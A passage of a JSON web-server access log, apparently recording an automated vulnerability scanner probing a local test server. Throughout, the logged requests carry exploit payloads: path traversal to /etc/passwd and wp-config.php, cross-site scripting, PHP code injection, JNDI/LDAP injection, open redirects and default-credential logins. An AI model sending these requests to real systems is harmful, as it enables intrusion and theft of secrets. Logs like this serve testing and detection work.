"request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /svnserve.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dfshealth.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://example.com&action=nf_oauth_connect HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/production.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"user_name=admin&password=admin&Login=Login&forward=&ci_csrf_token_FUEL={{csrftoken}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fuel/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"_session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D=29N5m8nFgez1VV9eT75cpKLvkoe&settings%5Burl%5D=%2F29N5m8nFgez1VV9eT75cpKLvkoe&fileName=29N5m8nFgez1VV9eT75cpKLvkoe&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /backend/cms HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ads/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/production.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/elementor/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"_session_key={{session_key}}&_token={{token}}&search=&type=page","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /backend/cms HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/user/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adserve/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /production.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"_session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path=29N5m8nFgez1VV9eT75cpKLvkoe.htm","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /backend/cms HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/c/d/android.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/assets/backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adserver/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"{\x0D\x0A \x22type\x22:\x22read\x22,\x0D\x0A \x22mbean\x22:\x22java.lang:type=Memory\x22,\x0D\x0A \x22target\x22:{\x0D\x0A \x22url\x22:\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jolokia/read/getDiagnosticOptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"{\x22sheet\x22:[\x22.es(*)\x22],\x22time\x22:{\x22from\x22:\x22now-1m\x22,\x22to\x22:\x22now\x22,\x22mode\x22:\x22quick\x22,\x22interval\x22:\x22auto\x22,\x22timezone\x22:\x22Asia/Shanghai\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/timelion/run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///https://example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/assets/backend/elfinder/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22userReference\x22:{},\x22loginReference\x22:{\x22link\x22:\x22http://localhost/mgmt/shared/gossip\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mgmt/shared/authn/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openx/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"id=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /metrics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%3C%3E//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/elfinder/elfinder-cke.html 